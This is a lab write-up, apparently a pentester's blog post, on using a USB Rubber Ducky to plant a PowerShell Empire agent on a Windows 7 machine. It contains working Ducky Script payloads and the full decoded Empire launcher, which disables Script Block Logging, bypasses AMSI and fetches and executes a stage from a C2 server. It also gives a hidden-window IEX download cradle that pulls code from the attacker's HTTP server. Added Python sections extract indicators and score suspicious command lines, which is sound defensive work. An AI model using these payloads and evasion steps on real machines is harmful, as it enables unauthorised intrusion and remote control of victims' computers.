Gaining a foothold: The Rubber Ducky and PowerShell Empire

So, I recently acquired my first rubber ducky and I've been messing around with it quite a bit. I wanted to document the basic setup and provide some links for further reading.

All of my write-ups are conducted in a lab, but I try to emulate what can happen in real life. In the example below, I want to emulate a Rubber Ducky being plugged into a corporate-managed Windows device. This could happen either through an attacker gaining physical access and plugging the Rubber Ducky in directly or, as has been done in past years, by dropping them in parking lots and waiting for employees to pick them up and plug them into their workstations. Either way, let's demonstrate what can happen.

We will be using Kali as both our payload-generating machine and our PowerShell Empire server, and we will be attacking a Windows 7 host.

To start, we need to know which pieces of the Rubber Ducky do what. In its simplest form we will be using three pieces: the micro SD card that carries our payload, the USB card reader that lets us write to it, and the Ducky itself, the USB device that delivers our payload.

USB used to write the payload (micro SD card reader)

USB used to deliver the payload (the Ducky)

To begin, we make sure Kali can see the USB device (if you're running Kali in VirtualBox, you'll need to install the VirtualBox Extension Pack and pass the USB device through to the VM). We insert the micro SD card into the card reader and plug it in. Once that's done, your Kali VM should see the Ducky's SD card as removable storage.



Now that the Ducky's card is mounted, it's time to write some payloads. You'll want the Duck Encoder (duckencoder.jar), which can be found in Hak5darren's USB-Rubber-Ducky repository on GitHub.

Once you have the duckencoder, let's write a payload that creates a PowerShell Empire agent calling back to our attacking machine. We start Empire and create a listener. We then run usestager windows/ducky, set its Listener option to the listener we just created, and execute. And look at that! Empire writes the entire Ducky Script payload for us:

DELAY 3000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRING powershell -W Hidden -nop -noni -enc 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 
ENTER

We paste these commands into a file, which we called "PSEmpireDucky.txt".


We then run the duckencoder with "PSEmpireDucky.txt" as the input file. This generates an inject.bin file, which we copy to the Rubber Ducky's SD card as shown below:


root@kali:~/LAB/RubberDucky# java -jar duckencoder.jar -i PSEmpireDucky.txt 
Hak5 Duck Encoder 2.6.3

Loading File .....  [ OK ]
Loading Keyboard File ..... [ OK ]
Loading Language File ..... [ OK ]
Loading DuckyScript ..... [ OK ]
DuckyScript Complete..... [ OK ]

root@kali:~/LAB/RubberDucky# ls
duckencoder.jar  inject.bin  PSEmpireDucky.txt
root@kali:~/LAB/RubberDucky# cp inject.bin /media/root/Ducky/
root@kali:~/LAB/RubberDucky# ls /media/root/Ducky/
inject.bin
root@kali:~/LAB/RubberDucky# 

Now that inject.bin is on the card, we unmount the card reader (so the write is flushed), remove it, take the micro SD card out of it and insert the card into the Ducky, the USB device that will deliver the payload.

We then plug the Rubber Ducky into the victim Windows 7 machine. As shown below, the Ducky types its payload on the Windows 7 target and an agent checks in to Empire on our Kali machine:



However, during testing, it took a long time for the Ducky to type the PowerShell command and for it to execute: roughly 30 seconds. We may not have that much time. So, what can we do to not only speed this up but also add some stealth?

One option is to host the PowerShell Empire launcher somewhere we control and have the Ducky type only a short PowerShell command that downloads and executes it. The Ducky then has to type one short line instead of the whole base64-encoded launcher.

To do this, take the base64 blob from the -enc argument of the generated payload and decode it. Note that PowerShell's -enc (-EncodedCommand) takes base64 of UTF-16LE text, so the raw output of base64 -d has a NUL byte after every character; the terminal hides them, but convert the text (for example with iconv -f UTF-16LE -t UTF-8) before saving it to a file:


root@kali:/var/www/html# echo "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" | base64 -d
IF($PSVeRSIonTabLe.PSVersioN.MAJor -gE 3){$GPF=[REF].ASsEmbly.GetType('System.Management.Automation.Utils')."GeTFiE`ld"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GETVaLue($NuLl);If($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VAL=[CoLlecTiONS.GeNeRiC.DIcTIonarY[STriNG,SysTeM.ObjEcT]]::neW();$VAl.Add('EnableScriptB'+'lockLogging',0);$Val.ADD('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VaL}ELSe{[ScriPTBLocK]."GEtFiE`LD"('signatures','N'+'onPublic,Static').SeTValUE($nuLl,(NEW-OBjEct COlLECTIONs.GeNERIc.HASHSEt[String]))}[Ref].ASsEmbly.GeTTYpE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFieLd('amsiInitFailed','NonPublic,Static').SeTVALue($nuLl,$TRUE)};};[SYSTEm.Net.SerVicEPOinTMAnAgER]::EXPeCt100CONTInue=0;$wC=NEW-ObjecT SYsteM.NEt.WEbCLient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$Wc.HeAdERS.Add('User-Agent',$u);$WC.PROxY=[SYSTeM.NeT.WebReQUEST]::DeFaulTWebPrOxy;$wc.PROXy.CreDEnTiAlS = [SYsTEM.NET.CREDeNTIALCACHE]::DEFaULTNETWoRKCREdentiaLs;$Script:Proxy = $wc.Proxy;$K=[SySteM.TeXT.ENcodINg]::ASCII.GETBYteS('J%PI]&M6KU)O#?W7z[DYrfRv<_huw{,/');$R={$D,$K=$ArgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COunT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXoR$S[($S[$I]+$S[$H])%256]}};$ser='http://10.10.50.101:8888';$t='/admin/get.php';$wC.HeaDers.ADD("Cookie","session=S+J2eqoTGDKr8k14tYURSCGtbEs=");$dAta=$WC.DowNLoADDATa($SER+$t);$iv=$data[0..3];$dAta=$Data[4..$dAtA.lENGth];-JoiN[ChAR[]](& $R $DAta ($IV+$K))|IEX
root@kali:/var/www/html# 

Once we have the decoded PowerShell script, we save it to a file called "PS-DuckyExploit.html" and use Python to start a simple HTTP server on port 8080 in that directory. We also update our Rubber Ducky payload: shorter delays, PowerShell launched straight from the Run dialog with a hidden window and an execution-policy bypass, and a download cradle that fetches the Empire launcher from our attacking machine's IP and port and pipes it to IEX. The shortened delays worked on this lab target; on a slower host the Run dialog may not be open yet when the STRING is typed, so tune the DELAY values to the target.
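As an added example (my code, not part of the original post or of Empire), here is the decoding step done in Python with the UTF-16LE handling made explicit, plus the network indicators pulled out of the launcher so a captured Ducky payload can be triaged without running it. SAMPLE_LAUNCHER is a constructed, shortened stand-in for the decoded script above that keeps its variable names ($u, $K, $ser, $t) and Cookie header; the staging key in it is made up, and the function names are mine.

```python
import base64
import re

# Constructed, shortened stand-in for the decoded Empire launcher shown above.
# It keeps the launcher's variable names ($u, $K, $ser, $t) and Cookie header so
# the extraction below also works on the full script; the C2 address, URI and
# cookie are the ones from this write-up, the staging key is made up.
SAMPLE_LAUNCHER = (
    "$wC=NEW-ObjecT SYsteM.NEt.WEbCLient;"
    "$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';"
    "$Wc.HeAdERS.Add('User-Agent',$u);"
    "$K=[SySteM.TeXT.ENcodINg]::ASCII.GETBYteS('0123456789abcdef0123456789abcdef');"
    "$ser='http://10.10.50.101:8888';$t='/admin/get.php';"
    '$wC.HeaDers.ADD("Cookie","session=S+J2eqoTGDKr8k14tYURSCGtbEs=");'
    "$dAta=$WC.DowNLoADDATa($SER+$t);"
)


def encode_command(script: str) -> str:
    """Produce what powershell -enc expects: base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def naive_decode(b64: str) -> bytes:
    """What `base64 -d` gives you: raw UTF-16LE bytes, one NUL after every ASCII character."""
    return base64.b64decode(b64)


def decode_command(b64: str) -> str:
    """Correct decoding of a -enc argument, equivalent to `base64 -d | iconv -f UTF-16LE -t UTF-8`."""
    return naive_decode(b64).decode("utf-16-le")


def extract_iocs(script: str) -> dict:
    """Pull the network indicators out of an Empire http launcher. Empire's random
    upper/lower-casing of identifiers does not matter: every match is case-insensitive."""
    def grab(pattern: str):
        match = re.search(pattern, script, re.IGNORECASE)
        return match.group(1) if match else None

    return {
        "server": grab(r"\$ser\s*=\s*'([^']+)'"),        # $ser='http://10.10.50.101:8888'
        "uri": grab(r"\$t\s*=\s*'([^']+)'"),             # $t='/admin/get.php'
        "user_agent": grab(r"\$u\s*=\s*'([^']+)'"),      # $u='Mozilla/5.0 ...'
        "cookie": grab(r'"Cookie"\s*,\s*"([^"]+)"'),     # session cookie sent with the stage request
        "staging_key": grab(r"GETBYTES\('([^']+)'\)"),   # RC4 staging key handed to the $R routine
    }


if __name__ == "__main__":
    blob = encode_command(SAMPLE_LAUNCHER)
    print("NUL bytes in base64 -d output:", b"\x00" in naive_decode(blob))
    for name, value in extract_iocs(decode_command(blob)).items():
        print(f"{name:12} {value}")
```

Run it against a real blob by passing the -enc argument to decode_command; the extracted server and URI are what you would hand to the network team, and the cookie and staging key identify this particular stager rather than Empire in general.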


root@kali:~/LAB/RubberDucky# cat PSEmpireDucky-Download.txt 
DELAY 500
GUI r   
DELAY 100    
STRING powershell -ep bypass -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.50.101:8080/PS-DuckyExploit.html')"
ENTER
root@kali:~/LAB/RubberDucky# java -jar duckencoder.jar -i PSEmpireDucky-Download.txt -o /media/root/Ducky/inject.bin
Hak5 Duck Encoder 2.6.3

Loading File .....  [ OK ]
Loading Keyboard File ..... [ OK ]
Loading Language File ..... [ OK ]
Loading DuckyScript ..... [ OK ]
DuckyScript Complete..... [ OK ]

root@kali:~/LAB/RubberDucky# ls
duckencoder.jar  inject.bin  PS-DuckyExploit.html  PSEmpireDucky-Download.txt  PSEmpireDucky.txt
root@kali:~/LAB/RubberDucky# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...

We then put the micro SD card back into the Rubber Ducky and deploy it on our Windows 7 machine:



Success! This version took only a few seconds to execute and we successfully received a shell.

Now, to get past security controls you would want to tinker with obfuscation and encryption, but the basics are already laid out. Note that the decoded Empire launcher already tries to turn off Script Block Logging and to disable AMSI (the cachedGroupPolicySettings and amsiInitFailed manipulation at the top of the script), but the short download cradle the Ducky types runs before any of that and is recorded as-is in process-creation logs (Sysmon Event ID 1, or Security event 4688 with command-line auditing enabled), as is the base64 blob in the first version.
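As an added example from the defender's side (my code, not from the post), here is how the two Ducky payloads in this write-up look to a process-creation log and a simple scoring rule over the command line, including seeing through the -enc blob. The sample command lines, the rule weights and the threshold are constructed for illustration; the -enc argument in the first line is a made-up UTF-16LE base64 string, not Empire's.

```python
import base64
import re

# Constructed -enc argument: UTF-16LE base64, as PowerShell requires, of a download
# cradle like the one the Ducky types. Not the Empire launcher from the write-up.
FAKE_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadData('http://10.10.50.101:8888/admin/get.php')"
    .encode("utf-16-le")
).decode("ascii")

# Constructed sample of the CommandLine field of Sysmon Event ID 1 / Security 4688 events.
# The first two mirror the Ducky payloads in this write-up; the rest are benign admin noise.
SAMPLE_COMMANDLINES = [
    f"powershell -W Hidden -nop -noni -enc {FAKE_ENC}",
    "powershell -ep bypass -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://10.10.50.101:8080/PS-DuckyExploit.html')\"",
    "powershell -NoProfile -File C:\\Scripts\\inventory.ps1",
    "C:\\Windows\\System32\\notepad.exe C:\\Users\\bob\\notes.txt",
    "powershell Get-ChildItem C:\\Temp",
]

# -e / -ec / -enc / -encodedcommand followed by a base64-looking token (the capture is decoded below)
ENC_RE = re.compile(r"-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# (name, weight, pattern). Single indicators are noisy; the combination is what the Ducky payloads produce.
RULES = [
    ("hidden_window", 2, re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I)),
    ("encoded_command", 2, ENC_RE),
    ("exec_policy_bypass", 1, re.compile(r"-e[px]\w*\s+bypass\b", re.I)),
    ("download_cradle", 3, re.compile(
        r"(?:IEX|Invoke-Expression).*?(?:Net\.WebClient|Download(?:String|Data|File))"
        r"|(?:Net\.WebClient|Download(?:String|Data|File)).*?(?:IEX|Invoke-Expression)", re.I)),
    ("no_profile_or_noninteractive", 1, re.compile(r"-no(?:p|profile|ni|ninteractive)\b", re.I)),
]
THRESHOLD = 3  # chosen for illustration; tune against your own baseline


def decode_encoded_argument(cmdline: str) -> str:
    """If the command line carries -enc, return the decoded script so the rules can see through it."""
    match = ENC_RE.search(cmdline)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_commandline(cmdline: str) -> dict:
    """Run every rule against the raw command line plus its decoded -enc payload, if any."""
    text = cmdline + "\n" + decode_encoded_argument(cmdline)
    hits = [name for name, _, rx in RULES if rx.search(text)]
    score = sum(weight for name, weight, _ in RULES if name in hits)
    return {"cmdline": cmdline, "hits": hits, "score": score, "suspicious": score >= THRESHOLD}


def triage(cmdlines) -> list:
    """Return only the command lines that cross the threshold, highest score first."""
    results = [score_commandline(c) for c in cmdlines]
    return sorted((r for r in results if r["suspicious"]), key=lambda r: -r["score"])


if __name__ == "__main__":
    for result in triage(SAMPLE_COMMANDLINES):
        print(result["score"], result["hits"])
        print("   ", result["cmdline"][:100])
```

Both Ducky payloads cross the threshold while the inventory script does not: the first one because decoding the -enc argument exposes the cradle hidden inside it, the second because the cradle is typed in clear text. Obfuscating the launcher does nothing about this layer; what the Ducky types is what the log records.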

Hope this has been helpful!

Until next time.

-geoda